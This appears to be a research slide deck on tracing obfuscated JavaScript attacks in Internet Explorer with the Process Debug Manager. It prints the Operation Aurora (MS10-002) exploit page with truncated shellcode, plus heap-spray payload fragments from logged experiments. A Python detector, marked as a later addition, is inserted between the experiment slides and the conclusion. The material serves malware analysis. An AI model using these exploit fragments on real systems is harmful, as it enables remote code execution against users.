Analysis of obfuscated Java Script exploitation using process debug manager
Ruo Ando, Network Security Institute, National Institute of Information and Communication Technology, Tokyo, Japan

Jwis2011 ruo ando


Page 1

Analysis of obfuscated Java Script exploitation using process debug manager

Ruo Ando, Network Security Institute,

National Institute of Information and Communication Technology, Tokyo, Japan

Page 2

Introduction: towards an alternative JavaScript debugger

• Nowadays, JavaScript is everywhere (including Android and Google App Engine), with the pervasiveness of JSON (RFC 4627), jQuery (AJAX interface) and so on.

• Consequently, JavaScript attacks have become sophisticated, with binary coding of attack code and obfuscation using concatenation, which imposes a great burden on security analysis.

• Unfortunately, there is no useful debugger specialized for this kind of JavaScript exploitation.

• In this paper we propose applying the Microsoft Visual Studio debugging extension to provide a new technique for tracing JavaScript behavior.

• The proposed system could extract features of some representative web attacks such as the Google Operation Aurora (MS10-002) and IE styleObject (MS09-072) exploits.

Page 3

The old new thing: impact and memory of the Google Aurora operation, an ultra-sophisticated advanced persistent attack

• The attack was named "Operation Aurora" by Dmitri Alperovitch, Vice President of Threat Research at the cyber security company McAfee, which informed the White House of this attack in January 2010.

• Origin: Operation Aurora is a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China.

• Ultra-sophisticated: the attacks were both sophisticated and well resourced, and consistent with an advanced persistent threat attack. The attack was aimed at dozens of other organizations, of which Adobe Systems, Juniper Networks and Rackspace have publicly confirmed that they were targeted. According to media reports, Yahoo, Symantec, Northrop Grumman, Morgan Stanley and Dow Chemical were also among the targets.

• Google and China: as a result of the attack, Google stated in its blog that it plans to operate a completely uncensored version of its search engine in China "within the law, if at all", and acknowledged that if this is not possible it may leave China and close its Chinese offices. Official Chinese media responded stating that the incident is part of a U.S. government conspiracy. The Aurora operation is said to be the Chinese government's attempt to wipe out Google from the mainland.

Page 4

BACKGROUND: the attack vector is very short. But ... can we analyze (or debug) this IE exploitation using commodity probes?

<html><head><script>
var sc = unescape("%u9090%u19eb%u4b5b%..");
var sss = Array(826, 679, 798, 224, 770, 427, 819,
    770, 707, 805, 693, 679, 784, 707, 280, 238, 259, 819, 336, 693, 336, 700, 259, 819, 336,
    224, 770, 427, 770, 322, 805, 819, 686, 805, 812, 798, 735, 770, 721, 280, 336, 448, 371);
var arr = new Array;
for (var i = 0; i < sss.length; i++) {
    arr[i] = String.fromCharCode(sss[i] / 7);
}
var cc = arr.toString();
cc = cc.replace(/,/g, "");
cc = cc.replace(/@/g, ",");
eval(cc);
var x1 = new Array();
for (i = 0; i < 200; i++) {
    x1[i] = document.createElement("COMMENT");
    x1[i].data = "abc";
};
var e1 = null;

function ev1(evt) {
    e1 = document.createEventObject(evt);
    document.getElementById("sp1").innerHTML = "";
    window.setInterval(ev2, 50);
}
function ev2() {
    p = "\u0c0d\u0c0d\u0c0d\u0c0d";
    for (i = 0; i < x1.length; i++) {
        x1[i].data = p;
    };
    var t = e1.srcElement;
}
</script></head>
<body><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)" width="16" height="16"></span>
</body>

It is impossible to trace the script engine's behavior while it allocates memory and processes the GIF!

Page 5

The new old thing: web attacks and JavaScript

• JavaScript is everywhere (including Android and Google App Engine), with the pervasiveness of JSON (RFC 4627), jQuery (AJAX interface) and so on.

• Unfortunately, again, there have not been striking probing (debugging) frameworks for tracing JavaScript behavior such as that of the Google Aurora operation described before.

• In this paper we exploit the debugger extension of Microsoft Visual Studio 2010 (or later) for tracking some famous JavaScript exploitation dynamically.

• Windows has the longer history and therefore more mature interfaces to probe JavaScript execution.

• We can conclude that the Microsoft PDM extension provides a new aspect for analyzing malicious JavaScript.

• The techniques we have obtained here could be applied to constructing probe modules for other systems such as the Dalvik VM of Android, because JavaScript behavior should be the same regardless of OS (platform) type.

Page 6

Commodity debuggers are not always enough! JavaScript and its semantic gap

• Current popular debugging tools such as OllyDbg and WinDbg are not optimized (or sufficient) for tracing the behavior of web scripting.

• There is a semantic gap between the kernel / user mode debugger and the web application execution layer.

[Figure: the semantic gap. Malicious JavaScript runs on the MS Active Scripting Engine (MS dynamic-link binaries such as Jscript.DLL). A user-mode debugger sees only memory allocate / read / write and file I/O requests; a kernel-mode debugger sees only native I/O requests and IRQ packets. Neither can understand what is going on at the script level; it only knows that a bad thing has happened.]

• The semantic gap means that a probe running in the user- or kernel-mode layer lacks knowledge of higher-level events such as a web browser property change. We cannot infer the event that occurred above from naive memory and I/O request APIs.

Page 7

PDM and SDM: an extension of Microsoft Visual Studio 2005 – 2010 and later

• PDM and SDM are components of the Microsoft Visual Studio debugging extension.

• PDM and SDM provide a higher-level debugging view, mainly for web scripting such as JavaScript.

• The Process Debug Manager (PDM) is a component that makes all running programs available to the VSPackage (Visual Studio debugger components).

• By registering with the PDM, we can track the function calls of high-level APIs invoked by the web browser. Property changes (such as variable substitution) can also be logged.

Manage chain: the PDM makes the target process available to the SDM and the DE. The session debug manager (SDM) manages several debug engines (DE). The DE uses an expression evaluator and a symbol handler. The SDM wraps the IDebugExpression2 interface to obtain a stack frame with the help of the DE via IDebugThread2::EnumFrameInfo.

Page 8

Behavior description of JavaScript in this paper

① File name
    r = debugDocument[i]->GetName(DOCUMENTNAMETYPE_URL, &filenameStr[i]);

② Function
    fDesc[i].pdsf->GetDescriptionString(0, &functionStr[i]);
    b2s(functionStr[i], function, BUFLEN);

③ Code (substitution)
    debugProperty = funcs->getDebugProperty(f);
    getPropertyInfoRecursive(debugProperty, props, 0);

④ Code (loop)
    props->propertyIsChanged(propInfos[i].m_bstrFullName, propInfos[i].m_bstrValue) == TRUE

Page 9

Sample output: www.yahoo.co.jp

Start Logging On: 2011/02/18 19:16:49
Process ID:7072
MaxDepth 1
Process Name:Windows Internet Explorer
Filename:http://www.yahoo.co.jp/
Function:JScript global code
window:DispHTMLWindow2:{...}
err:Object:{...}
ver:Undefined:undefined
YAHOO:Undefined:undefined
d:Undefined:undefined
$:Undefined:undefined
14:var ver="ga3_ie"
ver:String:"ga3_ie"
15:if(typeof YAHOO=="undefined"||!YAHOO)
15:var YAHOO={}
YAHOO:Object:{...}
15:YAHOO.namespace=function(){var a=arguments,b=null,d,e,c;for(d=0;d<a.length;d=d+1){c=(""+a[d]).split(".");b=YAHOO;for(e=(c[0]=="YAHOO")?1:0;e<c.length;e=e+1){b[c[e]]=b[c[e]]||{};b=b[c[e]]}}return b}
......

Annotations in the figure: process ID of IE; depth of logging; function invoked; property change; executed code (substitution); executed code (loop).

Page 10

Proposed system: IE initialization and main loop

[Figure: Internet Explorer (the debuggee) is published by PDM and SDM (the VS DBG extension); the logger's main loop runs in IApplicationDebugger::onHandleBreakPoint.]

① URL: what kind of URL was accessed?
    hr = sfDesc[i].pdsf->GetCodeContext(&codeContext);
    if (hr != S_OK) { goto out; }
    hr = codeContext->GetDocumentContext(&docContext[i]);
    if (hr != S_OK) { goto out; }
    hr = docContext[i]->GetDocument(&debugDocument[i]);
    if (hr != S_OK) { goto out; }
    hr = debugDocument[i]->GetName(DOCUMENTNAMETYPE_URL, &filenameStr[i]);

② Property change:
②-1: What kind of function was invoked?
    sfDesc[i].pdsf->GetDescriptionString(0, &functionStr[i]);
    b2s(functionStr[i], function, BUFLEN);
②-2: What kind of variables changed?
    debugProperty = funcs->getDebugProperty(f);
    getPropertyInfoRecursive(debugProperty, props, 0);

Main loop: IApplicationDebugger::onHandleBreakPoint

Page 11

Two core interfaces of SDM / PDM

• IRemoteDebugApplication interface (outside the debugger: connect, start and stop the debugger)
This registered interface allows the session debug manager (SDM) to obtain information about programs that have been "published" through the IDebugProgramPublisher2 interface.

• IApplicationDebugger interface (inside the debugger: CauseBreak, handling breakpoints)
Represents a running application. It does not need to correspond to an operating-system process. Typically, a debugger targets an application for debugging. The Process Debug Manager typically implements the application object.

Page 12

Publishing IE (1): injecting my callbacks

hr = PDM->WatchForProviderEvents(
        0,                   // tell the PDM that we want it to stop watching
        NULL,                // the PDM implementation of this interface does not require the 'port' parameter
        processId,           // the process id to query
        ScriptEngineFilter,  // we are interested in script code
        GUID_NULL,           // no launching engine
        pMyCallback          // callback interface
     );

Callbacks to inject (IDebugProgramProvider2 methods):

method: description
IDebugProgramProvider2::SetLocale: Establishes a locale for any language-specific resources needed by the DE.
IDebugProgramProvider2::WatchForProviderEvents: Establishes a callback to watch for provider events associated with specific kinds of processes.
IDebugProgramProvider2::GetProviderProgramNode: Gets a program node, given a specific process ID.
IDebugProgramProvider2::GetProviderProcessData: Obtains information about programs running, filtered in a variety of ways.

Page 13

Publishing IE (2): querying and unmarshaling before launch

for (DWORD pnode = 0; pnode < procData.ProgramNodes.dwCount; pnode++) {
    IDebugProviderProgramNode2 *dppn;
    // CHECK 1
    hr = procData.ProgramNodes.Members[pnode]->QueryInterface(__uuidof(IDebugProviderProgramNode2), (void**)&dppn);
    if (hr == S_OK) {
        IRemoteDebugApplication *rda;
        // CHECK 2
        hr = dppn->UnmarshalDebuggeeInterface(__uuidof(IRemoteDebugApplication), (void**)&rda);
        if (hr == S_OK) {
            procList[numScriptProcs] = processes[cp];
            applicationDebugger[numScriptProcs] = new JSLogApplicationDebugger(processId.ProcessId.dwProcessId, rda, maxDepth, maxStack, heckGlobal);
            applicationDebugger[numScriptProcs]->startDebugging();
            numScriptProcs++;
        }
    }
}

CHECK 1: QueryInterface inspects whether the object (IE in this case) supports a certain COM interface. If this method returns S_OK, Windows increments the object's reference count and the application can use the interface.

CHECK 2: UnmarshalDebuggeeInterface is used when the debug engine is running in the Visual Studio process space and the program being debugged is running in its own process space. It obtains a specified interface across process boundaries.

OK. Start the debugger using the IRemoteDebugApplication interface.

Page 14

Two core interfaces of the proposed system: active script debugger interface

• IRemoteDebugApplication interface, for connect / start / stop of the IE debugger

method: description
IRemoteDebugApplication::EnumGlobalExpressionContexts: Enumerates the global expression contexts for all languages running in this application.
IRemoteDebugApplication::GetRootNode: Returns the application node under which all nodes associated with the application are added.
IRemoteDebugApplication::GetName: Returns the name of this application node.
IRemoteDebugApplication::EnumThreads: Enumerates all threads known to be associated with the application.
IRemoteDebugApplication::QueryAlive: Indicates if the application is responsive.
IRemoteDebugApplication::CreateInstanceAtApplication: Provides a mechanism for the debugger IDE, running out-of-process to the application, to create objects in the application process.
IRemoteDebugApplication::GetDebugger: Returns the current debugger connected to the application.
IRemoteDebugApplication::DisconnectDebugger: Disconnects the current debugger from the application.
IRemoteDebugApplication::ConnectDebugger: Connects a debugger to this application.
IRemoteDebugApplication::CauseBreak: Causes the application to break into the debugger at the earliest opportunity.
IRemoteDebugApplication::ResumeFromBreakPoint: Continues an application that is currently in a breakpoint.

Page 15

Two core interfaces of the proposed system: active script debugger interface

• IDebugApplication interface, for causing / handling breakpoints in IE

method: description
IDebugProgramProvider2::SetLocale: Establishes a locale for any language-specific resources needed by the DE.
IDebugProgramProvider2::WatchForProviderEvents: Establishes a callback to watch for provider events associated with specific kinds of processes.
IDebugProgramProvider2::GetProviderProgramNode: Gets a program node, given a specific process ID.
IDebugProgramProvider2::GetProviderProcessData: Obtains information about programs running, filtered in a variety of ways.

Visual Studio Debugging Extensibility: http://msdn.microsoft.com/en-US/library/bb147088%28v=VS.80%29.aspx

Page 16

Property change detection in the main loop: digging stack frames online

① Get function name
    sfDesc[i].pdsf->GetDescriptionString(0, &functionStr[i]);

② Get file and URL
    IDebugCodeContext* codeContext;
    hr = sfDesc[i].pdsf->GetCodeContext(&codeContext);

③ Get property change
    debugProperty = funcs->getDebugProperty(f);
    getPropertyInfoRecursive(debugProperty, props, 0);

typedef struct tagDebugStackFrameDescriptor {
    IDebugStackFrame *pdsf;
    DWORD_PTR dwMin;
    DWORD_PTR dwLim;
    BOOL fFinal;
    IUnknown *punkFinal;
} DebugStackFrameDescriptor;

typedef struct DebugPropertyInfo {
    DBGPROP_INFO_FLAGS dwValidFields;
    BSTR bstrName;
    BSTR bstrType;
    BSTR bstrValue;
    BSTR bstrFullName;
    DBGPROP_ATTRIB_FLAGS dwAttrib;
    IDebugProperty* pDebugProp;
};

Inspecting stack frames: IDebugStackFrame::GetCodeContext, IDebugStackFrame::GetDescriptionString, IDebugStackFrame::GetLanguageString, IDebugStackFrame::GetThread

Page 17

Experiments

① Google Aurora attack (MS10-002 HTML object memory corruption)
MS10-002 is an HTML object memory corruption vulnerability, known from the Google Aurora attack. This cyber attack began in mid-2009 and was first publicly disclosed by Google in January in a blog post. The attack was also named "Operation Aurora" by Dmitri Alperovitch. McAfee Labs discovered that the Aurora malware included a file path from the attacker's machine.
• MSB-MS10-002
• CVE-2010-0249
• OSVDB-61697

② Active Directory Federation Service attack (MS09-072 ATL headers vulnerability)
MS09-072 is a vulnerability in Internet Explorer which affects Microsoft Active Directory Federation Service (ADFS). In MS07-072, an ActiveX control built with Microsoft Active Template Library (ATL) headers could allow an adversary to execute remote code. The ATL vulnerability prompted an out-of-band release earlier this year from Microsoft.
• MSB-MS09-072
• CVE-2009-3672
• OSVDB-50622
• BID-37085

Page 18

Experiment: Google Aurora attack

Start Logging On: 2011/05/30 23:13:54
Process ID:3652
MaxDepth 2
Process Name:Windows Internet Explorer
Filename:http://192.168.20.160:8080/qMoTNjaQzbNF
Function:JScript global code
window:DispHTMLWindow2:{...}
window.clientInformation:Object:{...}
--- snip ---
window.event:IHTMLEventObj:null
window.external:Object:{...}
window.frameElement:IHTMLFrameBase:null
window.window:DispHTMLWindow2:{...}
pNrDlDURxbASLo:Undefined:undefined
OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:Undefined:undefined
CLLFyYpDX:Undefined:undefined
HBohOxVqidZHilqXmLPfqaMYiv:Undefined:undefined
5:var pNrDlDURxbASLo = '0c053e66...'
pNrDlDURxbASLo:String:"0c053e66..."
6:var OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl = ''
OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s]"
7:i = 0
i:Number:0
7:i<pNrDlDURxbASLo.length
8:OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl += String.fromCharCode(parseInt(pNrDlDURxbASLo.substring(i, i+2), 16))
OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s][s]"
7:i+=2
i:Number:2
7:i<pNrDlDURxbASLo.length
8:OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl += String.fromCharCode(parseInt(pNrDlDURxbASLo.substring(i, i+2), 16))
OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s][s][s]"

Anomaly loop detected! Exploit or heap spray?

Payload:
var n=unescape("%u0c0d%u0c0d");
while(n.length<=524288) n+=n;
n=n.substring(0,524269-sc.length);
var x=new Array();
for(var i=0;i<200;i++) {x[i]=n+sc;}

Page 19

Experiment: MS09-072

Start Logging On: 2011/05/31 00:18:46
Process ID:688
MaxDepth 2
Process Name:Windows Internet Explorer
Filename:http://192.168.20.160:8080/1FysKckbN
Function:JScript - onload function
20:sFsSfxRecSIXauNmBnB()
Function:sFsSfxRecSIXauNmBnB
DRBfZcPV:Undefined:undefined
AcHKfoIb:Undefined:undefined

6:var DRBfZcPV = unescape
DRBfZcPV:Object:{...}
7:var AcHKfoIb =DRBfZcPV('%u350d%ufc03%u747a%u4976%u2593%f9f%' )
AcHKfoIb:String:"*******"
8:var OSGwFEcn = DRBfZcPV( "%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0")
OSGwFEcn:String:"**"
9:var pGgrrYDr = 20 + AcHKfoIb.length
pGgrrYDr:Number:520
10:while (OSGwFEcn.length < pGgrrYDr)
10:OSGwFEcn +=OSGwFEcn
OSGwFEcn:String:"****"
10:while (OSGwFEcn.length < pGgrrYDr)
10:OSGwFEcn+=OSGwFEcn
OSGwFEcnn:String:"********"
10:while (OSGwFEcn.length < pGgrrYDr)
10:OSGwFEcn+=OSGwFEcn
OSGwFEcn:String:"******************"
10:while (OSGwFEcn.length < pGgrrYDr)
10:OSGwFEcn+=OSGwFEcn
OSGwFEcn:String:"**********************************"

Anomaly loop detected! Malicious code is scanning memory ...

Payload?
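The log format shown on page 9 and the "anomaly loop detected" finding of the two experiments above, as an added Python example that is not part of the original paper or its logger: it parses a constructed log written in that format and flags a script line that re-executes while a String property grows on every pass, which is the shape of both the n += n heap spray and the byte-by-byte decoder loop in the experiments. The sample log, the regular expressions and the function names are my own assumptions about the format, not the paper's code.

```python
import re
from collections import defaultdict

# Constructed sample in the logger's own format (not from the slides): "Key:value"
# headers, "name:type:value" property changes and "N:code" executed-code lines.
SAMPLE_LOG = """\
Process ID:688
Filename:http://example.invalid/sample.html
Function:JScript global code
n:Undefined:undefined
9:var n = unescape("%u0c0d%u0c0d")
n:String:"**"
10:while (n.length < 16)
10:n += n
n:String:"****"
10:while (n.length < 16)
10:n += n
n:String:"********"
10:while (n.length < 16)
10:n += n
n:String:"****************"
12:var t = e1.srcElement
t:Object:{...}
"""

HEADER_KEYS = ("Start Logging On", "Process ID", "Process Name", "MaxDepth", "Filename", "Function")
CODE_RE = re.compile(r"^(\d+):(.*)$")            # executed code, prefixed by its script line
PROP_RE = re.compile(r"^([\w$.]+):(\w+):(.*)$")  # property change: name:type:value


def parse_log(text):
    """Split logger output into ('header', key, value), ('code', line, src) and
    ('prop', name, type, value) events, keeping the logged order."""
    events = []
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        key = next((k for k in HEADER_KEYS if line.startswith(k)), None)
        if key:
            events.append(("header", key, line[len(key):].lstrip(": ")))
        elif (m := CODE_RE.match(line)):
            events.append(("code", int(m.group(1)), m.group(2).strip()))
        elif (m := PROP_RE.match(line)):
            events.append(("prop", m.group(1), m.group(2), m.group(3)))
    return events


def find_anomalous_loops(events, min_iterations=3):
    """Flag a script line that runs repeatedly while a String property it writes
    grows on every pass: the shape of an n += n heap spray or a payload decoder."""
    seen = defaultdict(list)  # (line, src, property) -> string lengths observed
    last_code = None
    for ev in events:
        if ev[0] == "code":
            last_code = (ev[1], ev[2])
        elif ev[0] == "prop" and last_code and ev[2] == "String":
            seen[last_code + (ev[1],)].append(len(ev[3].strip('"')))
    return [
        {"line": line, "code": src, "property": prop, "lengths": ls}
        for (line, src, prop), ls in seen.items()
        if len(ls) >= min_iterations and all(b > a for a, b in zip(ls, ls[1:]))
    ]
```

Continuation lines of a statement wrapped over several log lines (the String.fromCharCode fragments on page 18) are ignored by the parser; joining them onto the preceding code line before parsing keeps the decoder loop detectable.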

Page 20

Conclusion and further work

Writing an alternative JavaScript debugger is an exciting challenge! It works partly now.

• JavaScript is everywhere (including Android and Google App Engine), with the pervasiveness of JSON (RFC 4627), jQuery (AJAX interface) and so on.

• However, and as further work: there have not been striking probing (debugging) frameworks for tracing JavaScript behavior.

• In this paper we exploit the debugger extension of Microsoft Visual Studio 2010 (or later) for tracking some famous JavaScript exploitation dynamically.

Extensibility for other operating systems and platforms
• Windows is the shortest path to understanding JavaScript behavior. Windows has the longer history and therefore more mature interfaces to probe JavaScript execution. The techniques we have obtained here could be applied to constructing probe modules for other systems such as the Dalvik VM of Android, because JavaScript behavior should be the same regardless of OS (platform) type.

IT IS NOT ENOUGH: a memory dump is necessary, eventually. Idea: anomaly loop detection of JavaScript + active memory monitoring by DLL injection etc.